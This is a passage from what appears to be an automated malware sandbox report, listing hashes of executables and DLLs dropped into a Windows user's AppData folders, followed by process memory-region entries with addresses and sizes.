            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\mozglue.dll
            MD5

            75f8cc548cabf0cc800c25047e4d3124

            SHA1

            602676768f9faecd35b48c38a0632781dfbde10c

            SHA256

            fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0

            SHA512

            ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f

          • \Users\Admin\AppData\Local\Temp\msvcp140.dll
            MD5

            109f0f02fd37c84bfc7508d4227d7ed5

            SHA1

            ef7420141bb15ac334d3964082361a460bfdb975

            SHA256

            334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

            SHA512

            46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

          • \Users\Admin\AppData\Local\Temp\nss3.dll
            MD5

            d7858e8449004e21b01d468e9fd04b82

            SHA1

            9524352071ede21c167e7e4f106e9526dc23ef4e

            SHA256

            78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db

            SHA512

            1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440

          • \Users\Admin\AppData\Local\Temp\softokn3.dll
            MD5

            471c983513694ac3002590345f2be0da

            SHA1

            6612b9af4ff6830fa9b7d4193078434ef72f775b

            SHA256

            bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f

            SHA512

            a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410

          • \Users\Admin\AppData\Local\Temp\vcruntime140.dll
            MD5

            7587bf9cb4147022cd5681b015183046

            SHA1

            f2106306a8f6f0da5afb7fc765cfa0757ad5a628

            SHA256

            c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

            SHA512

            0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

          • \Users\Admin\AppData\Roaming\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • \Users\Admin\AppData\Roaming\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • memory/820-138-0x0000000004F55000-0x0000000004F66000-memory.dmp
            Filesize

            68KB

          • memory/820-135-0x0000000004F50000-0x0000000004F51000-memory.dmp
            Filesize

            4KB

          • memory/820-127-0x0000000000000000-mapping.dmp
          • memory/992-192-0x0000000000000000-mapping.dmp
          • memory/992-198-0x0000000004940000-0x0000000004941000-memory.dmp
            Filesize

            4KB

          • memory/1308-59-0x0000000072C41000-0x0000000072C44000-memory.dmp
            Filesize

            12KB

          • memory/1308-60-0x00000000706C1000-0x00000000706C3000-memory.dmp
            Filesize

            8KB

          • memory/1308-62-0x0000000076281000-0x0000000076283000-memory.dmp
            Filesize

            8KB

          • memory/1308-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1336-268-0x00000000045A0000-0x0000000004624000-memory.dmp
            Filesize

            528KB

          • memory/1336-172-0x0000000000405E28-mapping.dmp
          • memory/1336-197-0x0000000003E50000-0x0000000003F50000-memory.dmp
            Filesize

            1024KB

          • memory/1380-209-0x0000000001F30000-0x0000000002B7A000-memory.dmp
            Filesize

            12.3MB

          • memory/1380-200-0x0000000000000000-mapping.dmp
          • memory/1380-208-0x0000000001F30000-0x0000000002B7A000-memory.dmp
            Filesize

            12.3MB

          • memory/1400-181-0x0000000000000000-mapping.dmp
          • memory/1400-187-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
            Filesize

            4KB

          • memory/1400-188-0x0000000004EC5000-0x0000000004ED6000-memory.dmp
            Filesize

            68KB

          • memory/1512-153-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1512-150-0x0000000000405E28-mapping.dmp
          • memory/1512-149-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1572-119-0x0000000000000000-mapping.dmp
          • memory/1572-122-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
            Filesize

            4KB

          • memory/1572-124-0x00000000047E0000-0x00000000047E1000-memory.dmp
            Filesize

            4KB

          • memory/1572-139-0x00000000047E5000-0x00000000047F6000-memory.dmp
            Filesize

            68KB

          • memory/1612-190-0x00000000000F0000-0x00000000000F1000-memory.dmp
            Filesize

            4KB

          • memory/1612-189-0x0000000000000000-mapping.dmp
          • memory/1620-147-0x0000000005590000-0x000000000560B000-memory.dmp
            Filesize

            492KB

          • memory/1620-137-0x0000000004E95000-0x0000000004EA6000-memory.dmp
            Filesize

            68KB

          • memory/1620-136-0x0000000004E90000-0x0000000004E91000-memory.dmp
            Filesize

            4KB

          • memory/1620-128-0x0000000000000000-mapping.dmp
          • memory/1620-142-0x0000000004370000-0x00000000043C8000-memory.dmp
            Filesize

            352KB

          • memory/1664-179-0x0000000000000000-mapping.dmp
          • memory/1740-103-0x00000000025A0000-0x00000000031EA000-memory.dmp
            Filesize

            12.3MB

          • memory/1740-125-0x00000000062E0000-0x00000000062E1000-memory.dmp
            Filesize

            4KB

          • memory/1740-105-0x00000000025A0000-0x00000000031EA000-memory.dmp
            Filesize

            12.3MB

          • memory/1740-88-0x0000000000000000-mapping.dmp
          • memory/1764-184-0x0000000000000000-mapping.dmp
          • memory/1904-174-0x0000000000405E28-mapping.dmp
          • memory/1960-140-0x0000000000000000-mapping.dmp
          • memory/1960-141-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
            Filesize

            8KB

          • memory/2016-106-0x00000000025A0000-0x00000000031EA000-memory.dmp
            Filesize

            12.3MB

          • memory/2016-104-0x00000000025A0000-0x00000000031EA000-memory.dmp
            Filesize

            12.3MB

          • memory/2016-90-0x0000000000000000-mapping.dmp
          • memory/2028-86-0x0000000006290000-0x0000000006291000-memory.dmp
            Filesize

            4KB

          • memory/2028-87-0x000000007EF30000-0x000000007EF31000-memory.dmp
            Filesize

            4KB

          • memory/2028-66-0x0000000004880000-0x0000000004881000-memory.dmp
            Filesize

            4KB

          • memory/2028-69-0x0000000000BE2000-0x0000000000BE3000-memory.dmp
            Filesize

            4KB

          • memory/2028-65-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
            Filesize

            4KB

          • memory/2028-67-0x0000000002610000-0x0000000002611000-memory.dmp
            Filesize

            4KB

          • memory/2028-63-0x0000000000000000-mapping.dmp
          • memory/2028-73-0x0000000005690000-0x0000000005691000-memory.dmp
            Filesize

            4KB

          • memory/2028-91-0x00000000062C0000-0x00000000062C1000-memory.dmp
            Filesize

            4KB

          • memory/2028-78-0x00000000060A0000-0x00000000060A1000-memory.dmp
            Filesize

            4KB

          • memory/2028-70-0x0000000004810000-0x0000000004811000-memory.dmp
            Filesize

            4KB

          • memory/2028-68-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
            Filesize

            4KB

          • memory/2028-79-0x0000000006200000-0x0000000006201000-memory.dmp
            Filesize

            4KB

          • memory/2184-219-0x0000000004942000-0x0000000004943000-memory.dmp
            Filesize

            4KB

          • memory/2184-218-0x0000000004940000-0x0000000004941000-memory.dmp
            Filesize

            4KB

          • memory/2184-212-0x0000000000000000-mapping.dmp
          • memory/2348-233-0x0000000000405E28-mapping.dmp
          • memory/2396-257-0x0000000004BD2000-0x0000000004BD3000-memory.dmp
            Filesize

            4KB

          • memory/2396-256-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
            Filesize

            4KB

          • memory/2396-236-0x0000000000000000-mapping.dmp
          • memory/2496-258-0x0000000000E20000-0x0000000000E21000-memory.dmp
            Filesize

            4KB

          • memory/2496-250-0x000000000043774E-mapping.dmp